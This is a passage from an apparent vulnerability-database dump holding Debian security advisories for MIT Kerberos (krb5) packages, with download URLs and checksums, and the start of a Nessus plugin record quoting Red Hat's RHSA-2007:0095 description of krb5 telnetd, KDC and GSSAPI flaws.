efbcac04e0d2aef2c4995ead413140be\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.4.4-7etch1_sparc.deb\n Size/MD5 checksum: 166156 a5b3a968d0d8f807cd5d9a95f12dc4cd\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dbg_1.4.4-7etch1_sparc.deb\n Size/MD5 checksum: 961308 c3d4084b1295e84e1e8a615151a9b2d0\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.4.4-7etch1_sparc.deb\n Size/MD5 checksum: 679936 e44ec1e4e41e162a5b3cc6e190260fdc\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.4.4-7etch1_sparc.deb\n Size/MD5 checksum: 372204 a7ec5df178d138eb4cf8e31402970bfd\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show &lt;pkg&gt;&#x27; and http://packages.debian.org/&lt;pkg&gt;", "cvss3": {}, "published": "2007-04-03T21:15:24", "type": "debian", "title": "[SECURITY] [DSA 1276-1] New krb5 packages fix several vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0956", "CVE-2007-0957", "CVE-2007-1216"], "modified": "2007-04-03T21:15:24", "id": "DEBIAN:DSA-1276-1:C7435", "href": "https://lists.debian.org/debian-security-announce/2007/msg00032.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-02T17:35:34", "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 1146-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nAugust 9th, 2006 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : krb5\nVulnerability : programming error\nProblem type : local\nDebian-specific: no\nCVE IDs : CVE-2006-3083 CVE-2006-3084\nCERT advisories: VU#580124 VU#401660\n\nIn certain application programs packaged in the MIT Kerberos 5 source\ndistribution, calls to setuid() and seteuid() are not always checked\nfor success and which may fail with some PAM configurations. A local\nuser could exploit one of these vulnerabilities to result in privilege\nescalation. No exploit code is known to exist at this time.\n\nFor the stable distribution (sarge) these problems have been fixed in\nversion 1.3.6-2sarge3.\n\nFor the unstable distribution (sid) these problems have been fixed in\nversion 1.4.3-9.\n\nWe recommend that you upgrade your krb5 packages.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given at the end of this advisory:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.1 alias sarge\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5_1.3.6-2sarge3.dsc\n Size/MD5 checksum: 782 df8c8142c32fb06bcf09d5c44d4f9ea1\n http://security.debian.org/pool/updates/main/k/krb5/krb5_1.3.6-2sarge3.diff.gz\n Size/MD5 checksum: 663073 2e75d18a0b91e88b3df87439d981438a\n http://security.debian.org/pool/updates/main/k/krb5/krb5_1.3.6.orig.tar.gz\n Size/MD5 checksum: 6526510 7974d0fc413802712998d5fc5eec2919\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-doc_1.3.6-2sarge3_all.deb\n Size/MD5 checksum: 718328 f2595b87eb8731af975215775c44e00b\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.3.6-2sarge3_alpha.deb\n Size/MD5 checksum: 113770 53afa9353cfd612c1a4ce697390f1ff1\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.3.6-2sarge3_alpha.deb\n Size/MD5 checksum: 246936 bbfa0e6c00e69cf2df0d6957bdcc185f\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.3.6-2sarge3_alpha.deb\n Size/MD5 checksum: 62396 d13ec27eb3be9b7c210887519e5c1ce3\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.3.6-2sarge3_alpha.deb\n Size/MD5 checksum: 136856 303321f333c9835dbef85cf4b222da73\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.3.6-2sarge3_alpha.deb\n Size/MD5 checksum: 89594 27eb1a246db85bbe41280ba0b558429b\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.3.6-2sarge3_alpha.deb\n Size/MD5 checksum: 71766 b7ecdfdeee2a15d2694cea550c172897\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.3.6-2sarge3_alpha.deb\n Size/MD5 checksum: 145408 fef89723c90a38d76429f00802b39619\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.3.6-2sarge3_alpha.deb\n Size/MD5 checksum: 200660 6801613fb91bc9e655ca301d48782f69\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.3.6-2sarge3_alpha.deb\n Size/MD5 checksum: 861152 aad361c2f76f13fc3d7c857831f7524a\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.3.6-2sarge3_alpha.deb\n Size/MD5 checksum: 422316 ab1c2ea1a3c4da8e4a53caf9e59e0725\n\n AMD64 architecture:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.3.6-2sarge3_amd64.deb\n Size/MD5 checksum: 104030 42f5d96cd63367c8641177d5f087c0cd\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.3.6-2sarge3_amd64.deb\n Size/MD5 checksum: 216384 9e52260fcac54a436280ea705a772fca\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.3.6-2sarge3_amd64.deb\n Size/MD5 checksum: 56438 abca496cfe9100f2e98787baf7cb9596\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.3.6-2sarge3_amd64.deb\n Size/MD5 checksum: 124162 d19d239b1435c4d61532b05a3ccec5ff\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.3.6-2sarge3_amd64.deb\n Size/MD5 checksum: 82198 01f9adf1df2dfec4705e195bfb987809\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.3.6-2sarge3_amd64.deb\n Size/MD5 checksum: 62948 2f214984d0398eb0b7be737e7449137f\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.3.6-2sarge3_amd64.deb\n Size/MD5 checksum: 137194 ef1437a40dcb3a2b693bc18b62eb5305\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.3.6-2sarge3_amd64.deb\n Size/MD5 checksum: 177044 fcb495788de9ace6387613104305d1fc\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.3.6-2sarge3_amd64.deb\n Size/MD5 checksum: 651714 9c42b3ae304ee6b99205a739e5525f2b\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.3.6-2sarge3_amd64.deb\n Size/MD5 checksum: 368844 a6d46ba74757d0b3290cccc7d2a071cd\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.3.6-2sarge3_arm.deb\n Size/MD5 checksum: 92838 53115b51885ed7cc328d302b458bd7d1\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.3.6-2sarge3_arm.deb\n Size/MD5 checksum: 192330 b96c5f518c6b936ec850815dbc563444\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.3.6-2sarge3_arm.deb\n Size/MD5 checksum: 53132 d26a3b90c9739cc49b4832d4c6080a5a\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.3.6-2sarge3_arm.deb\n Size/MD5 checksum: 114880 1d3ee4ea1ed533d495a0f57a0a9b41fb\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.3.6-2sarge3_arm.deb\n Size/MD5 checksum: 74362 e4566a14988825c4b2b9e08de7004ac5\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.3.6-2sarge3_arm.deb\n Size/MD5 checksum: 57482 1d18ac632e9e60514ecf68993bccc324\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.3.6-2sarge3_arm.deb\n Size/MD5 checksum: 127014 f2c67cc5ac56c42c3018d817cf3cef24\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.3.6-2sarge3_arm.deb\n Size/MD5 checksum: 158120 3eebe39e58001ba876c6cbeb9e161487\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.3.6-2sarge3_arm.deb\n Size/MD5 checksum: 633252 b55abd0364621173f4c1f5261e9fa44e\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.3.6-2sarge3_arm.deb\n Size/MD5 checksum: 328604 092e97bd8efb2e88355663489961745b\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.3.6-2sarge3_i386.deb\n Size/MD5 checksum: 94894 c2a63602c4f4814ed7f231f52a48e946\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.3.6-2sarge3_i386.deb\n Size/MD5 checksum: 190924 9926ba246c49bb908e0caeb48f0238e6\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.3.6-2sarge3_i386.deb\n Size/MD5 checksum: 52294 6163d519b0a430556f95508422bcce5b\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.3.6-2sarge3_i386.deb\n Size/MD5 checksum: 115540 db679e7f19b98a7a8ecf0d0f61f15d81\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.3.6-2sarge3_i386.deb\n Size/MD5 checksum: 75288 e9fbe4b10637cdf4ced94a2b566b4448\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.3.6-2sarge3_i386.deb\n Size/MD5 checksum: 57080 90c1841a887804d0145b0eece47b3b0b\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.3.6-2sarge3_i386.deb\n Size/MD5 checksum: 127358 333b35931c6e9926ff2934d320401c97\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.3.6-2sarge3_i386.deb\n Size/MD5 checksum: 164978 51742df7d055e4bf6af3b3f57e2ff5a1\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.3.6-2sarge3_i386.deb\n Size/MD5 checksum: 573980 9225372462e8ace8494213cd3fe84fb7\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.3.6-2sarge3_i386.deb\n Size/MD5 checksum: 348792 00b39ddc324f2d2d43f701bbe63ee5bc\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.3.6-2sarge3_ia64.deb\n Size/MD5 checksum: 133244 252fd8d9577459865f69f16ab7a179e0\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.3.6-2sarge3_ia64.deb\n Size/MD5 checksum: 288826 af4e344f133c364d8af560957a8df23b\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.3.6-2sarge3_ia64.deb\n Size/MD5 checksum: 73052 62d1a4cb177c6f14c64c22a68ba64c6a\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.3.6-2sarge3_ia64.deb\n Size/MD5 checksum: 164528 f9d8ebe91ea0337b119f39fd07deec9b\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.3.6-2sarge3_ia64.deb\n Size/MD5 checksum: 104690 dc8a8fd34a202798c1e420e0f4feac42\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.3.6-2sarge3_ia64.deb\n Size/MD5 checksum: 79314 4c4e93be3b0a1b95e1e5c7c4a62b6bda\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.3.6-2sarge3_ia64.deb\n Size/MD5 checksum: 166886 d502e8edb9682232a95b9178ee98bd3d\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.3.6-2sarge3_ia64.deb\n Size/MD5 checksum: 239670 1a8cee5fa4ddfdad17778f2ea1c6ac83\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.3.6-2sarge3_ia64.deb\n Size/MD5 checksum: 889306 efd994be8fb083db25f98f8edfc3b03e\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.3.6-2sarge3_ia64.deb\n Size/MD5 checksum: 501774 498dc695dcb25d298f5b182d65927978\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.3.6-2sarge3_hppa.deb\n Size/MD5 checksum: 103882 27402cf5234a4479f83c62f26be6fb00\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.3.6-2sarge3_hppa.deb\n Size/MD5 checksum: 223564 54808e7c3cd8722b3bd6ca6a99be0423\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.3.6-2sarge3_hppa.deb\n Size/MD5 checksum: 58758 232f4f80e0f83b9e01c61bb5645249f9\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.3.6-2sarge3_hppa.deb\n Size/MD5 checksum: 124472 df7ea8d94ea5e8d0c6da1ef9acc85836\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.3.6-2sarge3_hppa.deb\n Size/MD5 checksum: 81382 d0b70026412c03338c9f4f896195c94f\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.3.6-2sarge3_hppa.deb\n Size/MD5 checksum: 63602 322fee31f223795f689d35933b2bf9af\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.3.6-2sarge3_hppa.deb\n Size/MD5 checksum: 138552 686154015abdae71c518f1c0dc35c489\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.3.6-2sarge3_hppa.deb\n Size/MD5 checksum: 186630 fb53d4f3864d10e93e36e097d0af6826\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.3.6-2sarge3_hppa.deb\n Size/MD5 checksum: 669004 bfa9b717e5537352de8ba494429432ce\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.3.6-2sarge3_hppa.deb\n Size/MD5 checksum: 383270 997eea65966d93d16e7efbf2be95b827\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.3.6-2sarge3_m68k.deb\n Size/MD5 checksum: 87954 5927446895eab80283dfed1e33c39acd\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.3.6-2sarge3_m68k.deb\n Size/MD5 checksum: 173612 0615e8c1a45808b8c8f6cff3b8b3289e\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.3.6-2sarge3_m68k.deb\n Size/MD5 checksum: 49176 d53c131075c1d4f4b182788d436ac8a4\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.3.6-2sarge3_m68k.deb\n Size/MD5 checksum: 106894 8ffa020e4dfa1e0ced3827baa2a2b936\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.3.6-2sarge3_m68k.deb\n Size/MD5 checksum: 70516 290cf25961145e884733bf6375096db5\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.3.6-2sarge3_m68k.deb\n Size/MD5 checksum: 52818 2756537211d7e5a363c7c7fcf8f3b954\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.3.6-2sarge3_m68k.deb\n Size/MD5 checksum: 121568 b20e988adce800577872609ae6b992c6\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.3.6-2sarge3_m68k.deb\n Size/MD5 checksum: 147170 5c7439a07b085999d3ec60a85a7d09b5\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.3.6-2sarge3_m68k.deb\n Size/MD5 checksum: 515354 58e17a812ca5d4ae4ddd1f4bd2284f98\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.3.6-2sarge3_m68k.deb\n Size/MD5 checksum: 305252 81ab52f220afe10f7bef339a1f153fb4\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.3.6-2sarge3_mips.deb\n Size/MD5 checksum: 102714 42e5b123e67157992aeda70ed54a2c48\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.3.6-2sarge3_mips.deb\n Size/MD5 checksum: 226182 4e2d8b831bba0e10b34ce86a1e870c77\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.3.6-2sarge3_mips.deb\n Size/MD5 checksum: 57574 55c9acdfea9d46f6bee9734088a6b5ca\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.3.6-2sarge3_mips.deb\n Size/MD5 checksum: 128720 0b5e52310cd648be48b2a8ef9a28e9d5\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.3.6-2sarge3_mips.deb\n Size/MD5 checksum: 81176 e6ed192c639360fec544181448ae754b\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.3.6-2sarge3_mips.deb\n Size/MD5 checksum: 64850 9ac8c8b9bf28a07b9682a18b562e3b3a\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.3.6-2sarge3_mips.deb\n Size/MD5 checksum: 146306 b9755921995a2728dcb03528b4bfc0ed\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.3.6-2sarge3_mips.deb\n Size/MD5 checksum: 163540 af12479b3dab6180bdc3f64f1e901719\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.3.6-2sarge3_mips.deb\n Size/MD5 checksum: 679386 5732c39c6b6f8f68c48be497fd13440f\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.3.6-2sarge3_mips.deb\n Size/MD5 checksum: 354754 d0fb84b9a7affd2d6229022f5c200fec\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.3.6-2sarge3_mipsel.deb\n Size/MD5 checksum: 102984 461a4539738e1a0f1b778948336ada70\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.3.6-2sarge3_mipsel.deb\n Size/MD5 checksum: 225956 7bfab26d6338fe7b5ff08b125999a049\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.3.6-2sarge3_mipsel.deb\n Size/MD5 checksum: 57578 68f5c0d8e56d1dfb06dfbbedffbd27ce\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.3.6-2sarge3_mipsel.deb\n Size/MD5 checksum: 129452 6d20ff7a9dcd5be87802d5934f32f704\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.3.6-2sarge3_mipsel.deb\n Size/MD5 checksum: 81452 e6db8f84c86bdf4853ddb7a04fea6769\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.3.6-2sarge3_mipsel.deb\n Size/MD5 checksum: 64602 a4128e1c41282c37fb623dffda5f46dd\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.3.6-2sarge3_mipsel.deb\n Size/MD5 checksum: 146092 9181715b0f4077ebf9f11394491f052f\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.3.6-2sarge3_mipsel.deb\n Size/MD5 checksum: 165000 1a92c99183301405f845078b225796f2\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.3.6-2sarge3_mipsel.deb\n Size/MD5 checksum: 682100 b1d3ca066a847ef1006f1d8b34484480\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.3.6-2sarge3_mipsel.deb\n Size/MD5 checksum: 354534 8c93408a4491d5f9f67b49a27d27403d\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.3.6-2sarge3_powerpc.deb\n Size/MD5 checksum: 104536 10bb668587c2ae672f6f891dab5e0970\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.3.6-2sarge3_powerpc.deb\n Size/MD5 checksum: 217226 b8dac77f30c9f4c3fe174b61f1aa8c46\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.3.6-2sarge3_powerpc.deb\n Size/MD5 checksum: 56412 8ded35353ce5efd002fc1e4f53fb173b\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.3.6-2sarge3_powerpc.deb\n Size/MD5 checksum: 125588 56be5626dd27ef3c9b0bdf4d5de6f9a5\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.3.6-2sarge3_powerpc.deb\n Size/MD5 checksum: 82098 d29dc35a58982d87147e377ac5817a32\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.3.6-2sarge3_powerpc.deb\n Size/MD5 checksum: 61042 580be28960c04072bc2a909f9ce34cf9\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.3.6-2sarge3_powerpc.deb\n Size/MD5 checksum: 143232 674c3a99c81dc1f38515874731bd09af\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.3.6-2sarge3_powerpc.deb\n Size/MD5 checksum: 165066 319b7bd874b9e5f34d3e38eafd9c74a5\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.3.6-2sarge3_powerpc.deb\n Size/MD5 checksum: 634344 c987a9cd3b1a54ee41961acaebd01237\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.3.6-2sarge3_powerpc.deb\n Size/MD5 checksum: 352518 5157d90954b7859620e18fbbfddfa16b\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.3.6-2sarge3_s390.deb\n Size/MD5 checksum: 98650 462d6dfab006f34f6c6436040ad8428c\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.3.6-2sarge3_s390.deb\n Size/MD5 checksum: 213598 0d14561167d5db582867c30e68844586\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.3.6-2sarge3_s390.deb\n Size/MD5 checksum: 56632 e70da2be6c9bd3ee119a9aab3fbe3ebe\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.3.6-2sarge3_s390.deb\n Size/MD5 checksum: 120626 52658794b6eef36c1637269293448261\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.3.6-2sarge3_s390.deb\n Size/MD5 checksum: 81764 0267de3b25d919036dd9b8740b7ebf27\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.3.6-2sarge3_s390.deb\n Size/MD5 checksum: 62714 18040cac9c66f0ce110a87d5d455e5aa\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.3.6-2sarge3_s390.deb\n Size/MD5 checksum: 132342 6d4f13bdbd36b0d33218d636db3b2faf\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.3.6-2sarge3_s390.deb\n Size/MD5 checksum: 179684 69ba3a57b66fcab029ecefa7ae09eef5\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.3.6-2sarge3_s390.deb\n Size/MD5 checksum: 624330 2103482460605ec90df54687c6d56751\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.3.6-2sarge3_s390.deb\n Size/MD5 checksum: 375578 0dc404d9ce7e00573e9fb4a024e67d8a\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.3.6-2sarge3_sparc.deb\n Size/MD5 checksum: 92538 64d322c748643962a60ebafd92114205\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.3.6-2sarge3_sparc.deb\n Size/MD5 checksum: 194002 eab627f7b6a794e8720d6eed45d58c52\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.3.6-2sarge3_sparc.deb\n Size/MD5 checksum: 52934 10488d7b0c2cec790a79f5b434c88479\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.3.6-2sarge3_sparc.deb\n Size/MD5 checksum: 113374 f3151e4a84c23789e5703bf6d615b723\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.3.6-2sarge3_sparc.deb\n Size/MD5 checksum: 72996 37e8825143d48b8fea57f09e0b433f8d\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.3.6-2sarge3_sparc.deb\n Size/MD5 checksum: 58268 c70dacb5c496f945220fac452771f176\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.3.6-2sarge3_sparc.deb\n Size/MD5 checksum: 126262 0575fbe57b13bc01d02f0f7784addae7\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.3.6-2sarge3_sparc.deb\n Size/MD5 checksum: 157058 bdaf3884529cbfb280a21ca608cc880a\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.3.6-2sarge3_sparc.deb\n Size/MD5 checksum: 576134 6e9b3a823d3d01a9222e5ead1507275c\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.3.6-2sarge3_sparc.deb\n Size/MD5 checksum: 329842 ebfd32dddeb86791b4c1bd393a3f335d\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show &lt;pkg&gt;&#x27; and http://packages.debian.org/&lt;pkg&gt;", "cvss3": {}, "published": "2006-08-09T06:10:06", "type": "debian", "title": "[SECURITY] [DSA 1146-1] New krb5 packages fix privilege escalation", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-3083", "CVE-2006-3084"], "modified": "2006-08-09T06:10:06", "id": "DEBIAN:DSA-1146-1:3A104", "href": "https://lists.debian.org/debian-security-announce/2006/msg00235.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-05-18T14:59:03", "description": "Updated krb5 packages that fix a number of issues are now available.\n\nThis update has been rated as having critical security impact by the Red Hat Security Response Team.\n\nKerberos is a network authentication system which allows clients and servers to authenticate to each other through use of symmetric encryption and a trusted third party, the KDC.\n\nA flaw was found in the username handling of the MIT krb5 telnet daemon (telnetd). A remote attacker who can access the telnet port of a target machine could log in as root without requiring a password.\n(CVE-2007-0956)\n\nNote that the krb5 telnet daemon is not enabled by default in any version of Red Hat Enterprise Linux. In addition, the default firewall rules block remote access to the telnet port. This flaw does not affect the telnet daemon distributed in the telnet-server package.\n\nFor users who have enabled the krb5 telnet daemon and have it accessible remotely, this update should be applied immediately.\n\nWhilst we are not aware at this time that the flaw is being actively exploited, we have confirmed that the flaw is very easily exploitable.\n\nThis update also fixes two additional security issues :\n\nBuffer overflows were found which affect the Kerberos KDC and the kadmin server daemon. A remote attacker who can access the KDC could exploit this bug to run arbitrary code with the privileges of the KDC or kadmin server processes. (CVE-2007-0957)\n\nA double-free flaw was found in the GSSAPI library used by the kadmin server daemon. Red Hat Enterprise Linux 4 and 5 contain checks within glibc that detect double-free flaws. Therefore, on Red Hat Enterprise Linux 4 and 5 successful exploitation of this issue can only lead to a denial of service. Applications which use this library in earlier releases of Red Hat Enterprise Linux may also be affected.\n(CVE-2007-1216)\n\nAll users are advised to update to these erratum packages which contain a backported fix to correct these issues.\n\nRed Hat would like to thank MIT and iDefense for reporting these vulnerabilities.", "cvss3": {}, "published": "2007-04-05T00:00:00", "type": "nessus", "title": "RHEL 2.1 / 3 / 4 / 5 : krb5 (RHSA-2007:0095)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0956", "CVE-2007-0957", "CVE-2007-1216"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:krb5-devel", "p-cpe:/a:redhat:enterprise_linux:krb5-libs", "p-cpe:/a:redhat:enterprise_linux:krb5-server", "p-cpe:/a:redhat:enterprise_linux:krb5-workstation", "cpe:/o:redhat:enterprise_linux:2.1", "cpe:/o:redhat:enterprise_linux:3", "cpe:/o:redhat:enterprise_linux:4", "cpe:/o:redhat:enterprise_linux:5"], "id": "REDHAT-RHSA-2007-0095.NASL", "href": "https://www.tenable.com/plugins/nessus/24948", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2007:0095. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(24948);\n script_version(\"1.35\");\n script_set_attribute(attribute:\"plugin_modification_date\", 